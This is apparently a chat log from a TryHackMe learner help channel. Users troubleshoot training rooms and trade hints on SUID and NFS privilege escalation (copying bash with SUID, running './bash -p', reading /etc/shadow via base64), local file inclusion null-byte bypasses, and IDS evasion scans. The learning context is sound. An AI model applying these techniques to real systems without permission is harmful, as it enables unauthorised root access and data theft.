I'd make use of find personally, if the usual /tmp and /dev/shm aren't available

So you would then "find" for diretories with curtain permission?

Yes, the find command can do that.

Guys yesterday I completed the Linux priv esc room but I have a question

I did the capstone challenge, I wasn’t able to read /etc/shadow neither root user wasn’t able, but with suid set on base64 I did my tasks , can u explain why?

Hi I just finished the Vulnerability Capstone and managed to run both exploits. However, I'm wondering without the hints, which part of the exploit code implies that we need to setup a reverse shell listener? I wanted to have a better understanding of the python code and checked out the author's README on Github but it seems he didn't need a reverse shell (https://github.com/padsalatushal/CVE-2018-16763)

Help me pls

Read the explanation of Task 7 again

I did it

But root user cannot read etc/shadow

(Inside the challenge)

So ??

So if the root user cannot read the file

check your id

are you root ??

With suid set ..yes

I’m root

share a screenshot of whoami command here

You should be able to read the shadow file if you're root

Yes bro that’s correct

But when I checked the permission file.. root user cannot read it

I ‘ll send the screenshot ..

I don't think so it is instructed to read the shadow file in the task. We just have to find flags and submit

i'm doing the net sec challenge, and the nmap scan is taking a while to complete. is it a bad idea to do the password bruteforce at the same time? looking at the system monitor on the attackbox it seems there's plenty of cpu overhead, and network traffic is about 1Mb/s

Press enter and see the status

hey guys anyone here for help maybe ?

Please state your question

so im in the Walking an Application room at task 3 https://tryhackme.com/room/walkinganapplication#
and i dont understand about which directory he talk about

he talking about the source code but i dont understand what is the directory

A directory is a location that stores files

yeah i know but how do i see the directory he talks about

its in the source code i guess

but i dont understand

Im on mobile so I cant have a really good look but I think this is the part youre looking for

no im on the source code already

just dont understand about what directory he talks about ...

Which browser are you using

lemme send a photo of the source code maybe you could help me

@midnight maple

Yeah

so he says in this case the all stored in the same directory but what is the directory and how do i see it on the source code

Do you see those urls

In link rel

yep

Assets/ is a directory for instance

In that dir, there might be files like stylesheets

In script tags youll find paths to external js files

and if i want to see this directory i just need to add /assets ?

to the url

ohh i get it

yeah i found it !

Cool 😁

so in source code of a website there can be either 1 directory like in our case or more ?

However the dev set it up

for example i could have 3 directorys to search on ?

But assets is a common dir

or usually its 1

It will likely be one ( assets is kind of the norm ) but it doesnt have to be

It can be anything but assets, styles or scripts as dir names are common

so in assets usually the web developer will put the external images/links etc ?

Usually stylesheets, scripts, images

Icons

images you can out in images/ folder things that you upload can go in upload/

Fonts maybe

so its important when i do a pentest to check the source code carefully

sounds like its one of the most important things

or maybe im just in the beginning of the beginning lol

is good to check source code. might be some interesting stuff indeed.

ok ty guys

Have fun 😁

@still swift it might help to check out a random site on github

You can find my website publicly for instance on github. If you look at the directories there, you may get a better idea of what it looks like from the developers side

And then it will make more sense too I hope 🙂 its not complicated but it helps to see it perhaps

oh cool! could you send me yours ?

i mean if its important i wanna dive deeper yeah

Here for instance you see that I used: styles, scripts and assets

So its just another way of structuring my files

so scripts is where the dev puts his script for interactive parts of his web

and style is the css files for how the web will look to the public side

the frontend

Can be. But some put styles and images and scripts in /assets together

am i right ;/

? *

oh ok

i think i got it now by 100% haha its simple

But yes thats about right. Css is the presentation ( the style ), scripts are the interactive parts and html is the markup

btw do you think i need to learn program language to become a pentester ?

because this is my goal to land a job and start a creer

Exactly 🙂 this is a very simple site but when there are frameworks involved, the project structures get a bit more complex. But it usually comes down to the same thing

or it is not a must

Best ask someone else 😁 I can only really tell you anything about development ( thats my field ). Some folks in here say you should, others say you dont need to. I think most agree its at least useful to be able to understand / read code to some extent

You could ask in #cyber-and-careers about those kinds of things

i think ill learn python

Thats probably a good choice imo

once i finish all the paths for pentesting and red team

But dont take this advice from me, haha

hahaha all good 🙂

thank you very much

No worries!

I will say knowing a programming language to help you write up scripts to automatic or make certain functions easier to executive repeatedly isn't a bad idea, it will make you more efficient however it isn't strictly necessary.

thanks alot !

Gave +1 Rep to @echo meteor

hi

what can i do if burp intruder response is empty after i press send?

Hi, can someone give me a hand understanding last challenge (#3) in the File Inclusion module?

In the challenge section

I tried to bypass the filters using GET, POST and COOKIE methods but none of them seems to work... i'm just lost

I also used burpsuite to be more precise

Best to show a screenshot of your request in burp

that's what i modified

POST request and the PATH value

i completed the challenge using curl from terminal

but still i don't understand why it doesn't work by doing this on burp

If you intercepted the request as GET, you can use right click to change it to POST, this will add a necessary header that you are missing in that screenshot

Okay so changing the method in the "request attributes" doesn't change it effectively?

Oh

i got it now

I mean it does, but you would have to manually add another header for the POST request, the right click function of burp is doing that for you automatically

i changed the method using the inspect element, and yes i got a new header "file" which worked now

thank you!

Gave +1 Rep to @shadow echo

Someone here?

yuup yuups

stuck with in a room.... ask for tips and solved alone after... xD

oh okay glad you could figure it out yourself... other wise there are lots of people here to help you solve said problems

anyone want to explain this room for me?

pls

its late here, im gonna try tomorrow with clean head, ty

Gave +1 Rep to @steel nymph

hey i've completed it a week ago. if u're still stuck u can dm me i'll help you

ty for the help

Gave +1 Rep to @pastel willow

Hi, I know this is quite an old message, but I've run into the exact same problem. If you happen to remember an explanation or if anyone else can explain why the query doesn't work, I'd really appreciate the help.

EDIT: nevermind, figured it out with a bit more digging through the server! But I will have to dig more online later to figure out why ||"like 'sql__four'"|| caused the sleep delay even though the db name ||has something else in place of the first _|| ? Leaving the edited comment instead of deleting the question in case someone else gets stuck and searches the same DB name looking for help. Happy New Year, y'all!

Ah, an explanation of SQL like operator that explains the problem: https://www.w3schools.com/sql/sql_like.asp

Glad to hear!

Hi
I have one doubt
Let say I am using a module in msfconsole which has an option PASSWORD.

Can we pass a path to rockyou.txt to this like we do
set PASSWORD 'path to rockyou' ?

No, that won't work

cool thanks for confirming

hey guys

im at subdomain enumeration room task 6 -virtual hosts

when i put the 2nd command using ffuf like they show there its not working but when i put the 1st one its working

can someone help ?

what is the size that i need to provide in the command that is what i didnt understand

Hello, i was completing the "Linux Privilege Escalation" room and in the task 7 I had to exploit SUID files to escalate privileges, but i couldn't find any SUID files that can get me root access. The /usr/bin/base64 had the SUID bit set so i used it to read contents of /etc/shadow and obtain password hashes and crack them the flag was located in a directory which the user user2 could access using the password i cracked i obtained the flag, but my main question is that did i skip anything or did i obtained the flag the intended way? i took a look at writeups, but they too used similar techniques.

tried every RE exploit for the Vulnerability Capstone -> Exploit Machine final question keep getting this weird "non-numeric value" errors on all the exploits...

In Lab #2, what is the directory specified in the include function?
Warning: include(includes/test) [function.include]: failed to open stream: No such file or directory in /var/www/html/lab2.php on line 26

Warning: include() [function.include]: Failed opening 'includes/test' for inclusion (include_path='.:/usr/lib/php5.2/lib/php') in /var/www/html/lab2.php on line 26

File inclusion room task 4

ok nvm got the ans

Can you share a screenshot ?? You have to first verify yourself for it

https://youtu.be/AO6B_GO0n0M

Hi, I have a problem with the task Linux PrivEsc: NFS, after compiling the exploit I'm getting this error:
./exp: /lib/x86_64-linux-gnu/libc.so.6: version `GLIBC_2.34' not found (required by ./exp)
Is this normal? Should I try with another version of gcc?

I finished Jr Pentester a few days ago what are some good follow on CTF's and paths?

#pre-security-legacy-path 
#974406074444685322 
#junior-pentester-path 
#878393611929129000 (optional)
#pentest-plus-path (optional)
#web-fundamentals-path 
#soc-level-1-path 
#offensive-pentesting-path 
#red-teaming-path 
#791764435991658556

for ctfs:
biohazard
agent sudo
bounty hacker
lazy admin
overpass 1-3

thanks man, I solved it.

Gave +1 Rep to @deft rain

Hi, I’m having a problem in the Linux Escalation Room for Kernal. My wget’s are timing out. I can’t reach out for anything. I gave up for the night and will try again tomorrow. Not really a question but advice welcome.

Can you share a screenshot of what wget command ??

Unfortunately not. I shutdown before remembering to do that. I was tired. I tried the same command on my personal kali box though and it pulled the file immediately, but in the room it continued to time out. I’ll try again later today.

Ping me if you face the same issue again

Will do. Thanks. I’m hoping this evening I’ll get back to it.

Which function is causing the directory traversal in Lab #4?

file_get_contents

really asking a question that have no ans available.. forced to waste time searching for an ans

What you mean, it's in the task text ?

This ans was repeated

how do i post a screenshot

You have to verify first

!docs verify

Okay, so the first one was found in the task text, the 2nd one was found in the warning by e.g. trying to include a file that doesn't exist

This morning I tried again, I have screenshots for the attempt it was better than last night as wget actually appeared to be working. Then it got a permissions denied errorJust set everything up again and now I can't type in the room - tried restarting the room as well, no dice still wont except keyboard input and its a terminal style room. I'll try again tomorrow.
Last night the wget would just timeout. I also tried going directly to the source where the exploit can be downloaded from but that times out as well. Thinking its just the way the room is setup to allow items from the attackbox but not open internet? Thanks for your input.

I had yesterday the same problem and could not wget to the raw file in the exploit database nor http.server. Have not found a solution

If you can check if you have that file in the same directory where you have started the server.

You're talking about the target machine right? I think that could be because they don't have internet access. You have to download the raw exploit in your attacking machine and then wget it

Hi everyone, i have an issue with the last task in the room "Cross-Site Scripting". It's recommanded to use the attack box to resolve the last question but i have an error with firefox (certificate issue). I can't access to http://ip.p.thmlabs.com/

I can't pass away the warning since I have a gateway time out

hey mickko, can you verify yourself and share a screenshot here ??

ok, i send a screenshoot

!docs verify

!notifyme

Ok @harsh epoch, you will now be notified of future announcements.

That's not how that url should be, it should have dashes - instead of dots in the "IP"

But the room should give you the right URL anyways if there even is such a way of accessing the target machine

With my own VM, i can access to the site web by not retreive the cookies'value to answer the question

Note: You may encounter issues with receiving the request using your own VM and the VPN. It is recommended you use the AttackBox for this task.

My fault, it's work with dashes

i use dots, my mistake

Gotcha, but that may not solve the issue with not being able to receive the staff-session cookie on your own VM

Now i can access website on the attack box using dashes, so i will can answer the question

On the attackbox you can also just use the IP, rather than that URL

But you'll see if it works or not, just trying to give you a heads up 🙂

Room completed, thx for your help

Gave +1 Rep to @shadow echo

Affirmative.

Hey! i have some questions in the challenge from the networking security module

the last section (the challenge) says that you have to do a scan without being detected from the IDS, but what does it mean? that we must archive 0%?

i did a scan with only 4% of detection but i haven't got a flag. maybe because i didn't scan all ports?

don't recall where the sweet spot was but you need to be somewhere under 10% detected but more detected then 0%

also had to do the scan from the attackbox and not shadows own machine or it was stuck on 0%

that could be the reason, i'm using my own VM

did u scan all ports? for what u recall

the detection works fine: if i don't use fragmentation the % goes crazy

think shadow tried both all ports and only the top 1000 most common ones

ok thanks for feedback, i'm giving a try on the attackbox

I got it, looks like it was my VM. thank you!

Thanks, @deft rain ! I got it to work, I went back to the tmp folder were I was originally and this time my wget worked! Not the first time, but it did. Thanks for offering your help the other evening and reminding me about being in the correct folder when I started my simple server via Python. It is nice to know when I'm on the correct path, and when I'm making mistakes so I learn from them.

Gave +1 Rep to @deft rain

where is the flag? i don't get it

file inclusion challenge #2

Can't solve flag3 too

already tried to use post

Is it possible to do LFI through cookies? (:

your value is wrong

the flag 3 its similar to flag 2, but with POST method

you need to put the path of flag2 on value

this is gonna fail, because .php you need to ignore this with %00 at the end

its the best thing i can do to help you without giving you the answer xD

its a hard challenge, dont worry

Stuck in "What the Shell" Task 13 questions. Opened linux machine and logged on, set up a listener , have error message:
-bash: syntax error near unexpected token `('

What am I doing wrong? Thanks for any help.

@steel nymph I thought I could use it; I was having trouble figuring out which shell I should try to upload. Where should I have looked? (Thanks for pointing this out.)

I'm an extreme noob, fwiw

I'm not a pro and my english is not the best but I'll try to answer... php is the language of web servers, thanks to it you can interact with the server like login or comment posts among other things. But in this case you are connecting to a system (not a web) through ssh protocol. When you are already connected to it, you gotta think that you are in another vm (in this case linux, but could be windows or anything else).

Gave +1 Rep to @lunar anvil

Then the shell can't be a php, gotta be a .sh (bash script)

Google it and you'll see that is even easier than a webshell

@limpid lily Your English is great! Thank you so much, I'll google it.

Gave +1 Rep to @limpid lily

I'm on task 11 of Privilege Escalation and getting a problem when I try to run my NFS executible in the room. This has happened with both creating the executable on my personal kali and on the THM kali. Apparently glibc 2.31 (the version running on the room) cannot run executables combiled with glibc 2.35 which is the version on the THM Kali and my box is running 2.36-4. Does anyone have an idea of a workaround for this?

yuup cross compiling issues... live of the land instead.... also known as copy the /bin/bash executable from the target into the nfs share then give it the right perms and finally run it with ./bash -p

what is -p supposed to do? because I just tried that and received the same error message as before. Thank you!

Gave +1 Rep to @sage current

that is specific to bash

              -p      Turn  on  privileged  mode.  In this mode, the $ENV and $BASH_ENV files are not processed, shell functions are not inherited from the environment, and the SHELLOPTS, BASHOPTS, CDPATH,
                      and GLOBIGNORE variables, if they appear in the environment, are ignored.  If the shell is started with the effective user (group) id not equal to the real user (group) id, and the -p
                      option  is  not  supplied,  these actions are taken and the effective user id is set to the real user id.  If the -p option is supplied at startup, the effective user id is not reset.
                      Turning this option off causes the effective user and group ids to be set to the real user and group ids.

is what it does for bash

it will spawn a bash instance with euid of root which you can see with the id command

meaning you can do root stuffs

thanks for the explanation, tried it.

gcc is not installed, and ./bash -p does not escalate

#room-bugs message

If ./bash -p is not giving you a root shell you might have done something wrong along the way, so probably your bash binary is not having SUID set and/or owned by root

I've rerun everything by what the room says and by various researches over 6 times today along, it is task 11 of the linux privilege escalation. i am setting this aside now and will try again another day. if you look above, i'm getting a compiler compatibility error. using ./bash -p was shadow's suggestion. unfortunately for me, it did not help with my compatibility problem. my binary is compiled in 2.35 and the room runs on 2.31. GCC is not installed according to the errors I am receiving so i cannot compile it on the host machine.

Did you check the link I posted for you ?

Also what shadow suggested was that you transfer the bash binary (the one that is already present by default, thus being compatible) from the target machine to your attacking machine, then set SUID and the root owner and place the bash binary back to the target machine via the NFS share which is having the no_root_squash option set

yuup exactly that

Yes, I did what shadow suggested. It was one of the several things I tried today before deciding to pause and go with fresh eyes later/tomorrow. I did look at the link, I will look at it again.

Edit to add: I just reread the link you shared and there is a piece of it I think will help that I may have missed earlier. Thank you.

Thank you both for your help!

EZ question I hope: What is my tun0 IP ? Is it the IP of the target machine?

No the IP of your own machine when it connects to the vpn. Basically a vpn ip

Thank you @shadow echo and @sage current -static fixed the problem and allowed the code to compile properly. Shadow, I still don't know what I did wrong earlier that your suggestion did not give access sooner. I appreciate what you said though and I've made note of it. I was not frustrated at your suggestion, just frustrated that I had tried it and i couldn't get it to work.

Gave +1 Rep to @shadow echo

• @sage current

Gave +1 Rep to @sage current

Hello,How days should i take to finish this path?

how many**

As many days as you need to understand the concepts behind it